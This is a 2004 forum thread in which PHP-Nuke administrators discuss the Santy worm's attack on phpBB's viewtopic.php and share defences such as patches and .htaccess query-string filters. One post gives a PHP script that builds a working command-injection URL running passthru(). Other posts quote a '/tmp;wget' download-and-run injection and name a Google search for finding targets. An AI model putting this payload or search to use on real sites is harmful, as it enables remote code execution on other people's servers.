| Author |
Message |
blith
Client
Joined: Jul 18, 2003
Posts: 977
|
 Posted:
Wed Dec 22, 2004 8:14 am |
 
|
|
 
|
|
sixonetonoffun
Spouse Contemplates Divorce
Joined: Jan 02, 2003
Posts: 2499
|
| Posted:
Wed Dec 22, 2004 9:36 am |
|
phpBB boards running version 2.0.11 aren't vulnerable. Also google filtered the search string already so it shouldn't be "in the wild" anymore. |
|
|
|
|
|
blith
Client
Joined: Jul 18, 2003
Posts: 977
|
| Posted:
Wed Dec 22, 2004 9:45 am |
|
Thank you. I am so paranoid... who's that? |
|
|
|
|
|
hitwalker
Sells PC To Pay For Divorce
Joined:
Posts: 5661
|
| Posted:
Wed Dec 22, 2004 10:17 am |
|
|
|
|
|
sixonetonoffun
Spouse Contemplates Divorce
Joined: Jan 02, 2003
Posts: 2499
|
| Posted:
Wed Dec 22, 2004 10:50 am |
|
Also if I understand it the correctly () chars are used in the request and they would be trapped even on a default nuke install. |
|
|
|
|
|
BohrMe
Hangin' Around
Joined: May 01, 2004
Posts: 28
Location: Fall River, MA
|
| Posted:
Wed Dec 22, 2004 11:26 am |
|
I'm running a heavily modified version of 6.9 and I really don't want to upgrade to a 7.x release in order to protect against this worm. I don't which would be worse, cleaning up after the worm or changing my codebase. And I've already cleaned up one phpBB site that I help maintain! |
|
|
|
|
|
sixonetonoffun
Spouse Contemplates Divorce
Joined: Jan 02, 2003
Posts: 2499
|
| Posted:
Wed Dec 22, 2004 11:39 am |
|
Are you using Nuke-Sentinel?
If so I think you could enter viewtopic.php as one of the string blockers for some added protection and maybe even NeverEverNoSanity. I'm sure Bob, Raven and others are looking very closely at the specific exploit to see if it can be used against the bbtonuke port. This should work though because viewtopic should always be accessed as file=viewtopic not viewtopic.php |
|
|
|
|
|
BohrMe
Hangin' Around
Joined: May 01, 2004
Posts: 28
Location: Fall River, MA
|
| Posted:
Wed Dec 22, 2004 11:46 am |
|
No, I don't use Nuke-Sentinel but I have taken some preliminary actions to help prevent the exploit... Other than a .htaccess modification, of course. |
|
|
|
|
|
blith
Client
Joined: Jul 18, 2003
Posts: 977
|
| Posted:
Wed Dec 22, 2004 11:46 am |
|
| sixonetonoffun wrote: | Are you using Nuke-Sentinel?
If so I think you could enter viewtopic.php as one of the string blockers for some added protection and maybe even NeverEverNoSanity. I'm sure Bob, Raven and others are looking very closely at the specific exploit to see if it can be used against the bbtonuke port. This should work though because viewtopic should always be accessed as file=viewtopic not viewtopic.php |
What could we put into the string blocker? |
|
|
|
|
|
manunkind
Client
Joined: Apr 26, 2004
Posts: 368
Location: Albuquerque, NM
|
| Posted:
Thu Dec 23, 2004 7:54 am |
|
Is it just in viewtopic.php? I ask this because I upgraded a few weeks ago to version 2.0.11 and I looked when I saw that posting and that file still had the old code in it. I replaced the code ASAP but was curious about it because people are saying that version 2.0.11 is already patched. |
|
|
|
|
|
Susann
Moderator
Joined: Dec 19, 2004
Posts: 3143
Location: Germany:Moderator German NukeSentinel Support
|
| Posted:
Thu Dec 23, 2004 8:00 am |
|
Maybe its not enough to fix viewtopic.php ?
Today the results for search in goggle.de
"This site is defaced" 343.000 (für) this site is defaced NeverEverNoSanity WebWorm generation 15 |
|
|
|
|
|
beetraham
Regular
Joined: Dec 13, 2003
Posts: 94
Location: Finland (EU)
|
| Posted:
Thu Dec 23, 2004 8:50 am |
|
As an additional security measure, please find an example of a *.htaccess* file based security block in the next (to be inserted into $NUKEROOT .htaccess file - for those being influenced by the presence of htaccess);
| Code: |
Options +SymlinksIfOwnerMatch
RewriteEngine On
RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)esystem(.*)
RewriteRule ^(.*) /
|
As a result of the above block, the parts of the commands being detected to be used in the worm's attack are filtered off prior to execution.
[please note: this may not be a bulletproof method for you - listed additional measures based on received recommendations from trusted ISP. It seems to be quite generally suspected, that this worm (or better, it's variants) will also use other medias than merely phpBB in the future to perform these sorts of attacks.]
-beetraham |
Last edited by beetraham on Thu Dec 23, 2004 10:34 am; edited 2 times in total |
|
|
|
|
BohrMe
Hangin' Around
Joined: May 01, 2004
Posts: 28
Location: Fall River, MA
|
| Posted:
Thu Dec 23, 2004 8:54 am |
|
How did you get so many hits for that search? When I go to google.de and search for the phrase "This site is defaced" I only get around 3,590. Yesterday that number was only 1,520 on google.com. |
|
|
|
|
|
Susann
Moderator
Joined: Dec 19, 2004
Posts: 3143
Location: Germany:Moderator German NukeSentinel Support
|
| Posted:
Thu Dec 23, 2004 10:40 am |
|
or you try: allinurl:viewtopic.php |
|
|
|
|
|
BohrMe
Hangin' Around
Joined: May 01, 2004
Posts: 28
Location: Fall River, MA
|
| Posted:
Thu Dec 23, 2004 10:47 am |
|
You should place quotes around your search string or just search for NeverEverNoSanity because you are getting a lot of false hits that have nothing to do with the Sanity worm. |
|
|
|
|
|
BohrMe
Hangin' Around
Joined: May 01, 2004
Posts: 28
Location: Fall River, MA
|
| Posted:
Thu Dec 23, 2004 10:49 am |
|
Oh yeah, the allinurl:viewtopic.php produces a 403. Google shut that search down because of Sanity. |
|
|
|
|
|
brine
New Member
Joined: Jan 28, 2004
Posts: 10
|
| Posted:
Thu Dec 23, 2004 10:22 pm |
|
I guess, sites that did not upgrade are safe far now...
|
|
|
|
|
|
BohrMe
Hangin' Around
Joined: May 01, 2004
Posts: 28
Location: Fall River, MA
|
| Posted:
Thu Dec 23, 2004 10:59 pm |
|
Hopefully, it's a lesson well learned by Google and all. |
|
|
|
|
|
brine
New Member
Joined: Jan 28, 2004
Posts: 10
|
| Posted:
Fri Dec 24, 2004 7:06 am |
|
| BohrMe wrote: | | Hopefully, it's a lesson well learned by Google and all. |
Somehow, I do think it will be. |
|
|
|
|
|
sixonetonoffun
Spouse Contemplates Divorce
Joined: Jan 02, 2003
Posts: 2499
|
| Posted:
Fri Dec 24, 2004 8:36 am |
|
One of the regulars is seeing a variant that is intended to exploit the phpnuke port at a very disturbing rate approx 25 per hour. Sentinel trapped it but that indicates its getting passed Apache. I tested it on a couple of sites of my own and it throws a 403.
Best thing is to make sure your viewtopic.php is patched regardless of googles response. |
|
|
|
|
|
BohrMe
Hangin' Around
Joined: May 01, 2004
Posts: 28
Location: Fall River, MA
|
| Posted:
Fri Dec 24, 2004 8:42 am |
|
| brine wrote: | | Somehow, I do think it will be. |
I've met some of the Google guys (namely Rob Pike) and they're sharper than you think. |
|
|
|
|
|
VinDSL
Life Cycles Becoming CPU Cycles
Joined: Jul 11, 2004
Posts: 617
Location: Arizona (USA) Admin: NukeCops.com Admin: Disipal Designs Admin: Lenon.com
|
| Posted:
Fri Dec 24, 2004 10:42 am |
|
You can use this script to see if your phpBB is vulnerable...
| Code: | <?php
$p='ls -al';
$highlight='passthru($HTTP_GET_VARS[p])';
print "?t=%37&p=";
for ($i=0; $i<strlen($p); ++$i) {
print '%' . bin2hex(substr($p,$i,1));
}
print "&highlight=%2527.";
for ($i=0; $i<strlen($highlight); ++$i) {
print '%' . bin2hex(substr($highlight,$i,1));
}
print ".%2527";
?>
|
Running this script on your web site should generate a request parameter.
All you need to do is copy 'n' paste the result onto:
| Code: | http://your-site.com/index.php?name=Forums&file=viewtopic
|
Example:
| Code: | http://your-site.com/index.php?name=Forums&file=viewtopic&?t=%37&p=%6c%73%20...<yada,yada>
|
As sixonetonoffun said, Nuke should trap it, even on a default install...  |
|
|
 |
|
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 16986
Location: Kansas
|
| Posted:
Fri Dec 24, 2004 3:54 pm |
|
NukeSentinel traps it, but if you want tp stop it at the server level, see my post |
|
|
 
|
|
beetraham
Regular
Joined: Dec 13, 2003
Posts: 94
Location: Finland (EU)
|
| Posted:
Sat Dec 25, 2004 7:59 pm |
|
Just as a heads-up...
| Quote: | [http://securityfocus.com/archive/1/385463/2004-12-22/2004-12-28/0]
To: BugTraq
Subject: New Santy-Worm attacks *all* PHP-skripts
Date: Dec 25 2004 5:12PM
Author: Juergen Schmidt <ju heisec de>
Message-ID: <Pine.LNX.4.58.0412251805110.19888@loki.ct.heise.de>
Hello,
the new santy version not only attacks phpBB.
It uses the brasilian Google site to find all kinds of PHP skripts.
It parses their URLs and overwrites variables with strings like:
/tmp;wget
Often enough this leads to download and execution of code. On success the worm connects to an IRC server, where already more than 700 zombies are waiting for commands.
|
|
|
|
|
|
|
PHrEEkie
Subject Matter Expert
Joined: Feb 23, 2004
Posts: 358
|
| Posted:
Sat Dec 25, 2004 9:38 pm |
|
Ok, now I understand exactly why I haven't had even one attack across an entire server running multiple Nukes and phpBB standalones. Way back when the Brazilian folks started focusing on Nuke vulns, I banned server-wide the entire continent of South America. I would then imagine that the brazilian Google engine has none of my server's content available.
Just luck, I guess... I've had those foos banned for almost 2 years, and now that this concentrated attack is under way, I haven't had even one hit so far. Wish I was this lucky playing the Lottery!
PHrEEk |
|
|
|
|
|
|
|
|
|
![[Valid RSS]](http://www.ravenphpscripts.com/images/valid-rss.png "Validate my RSS feed"){kind=small}
:: 
::
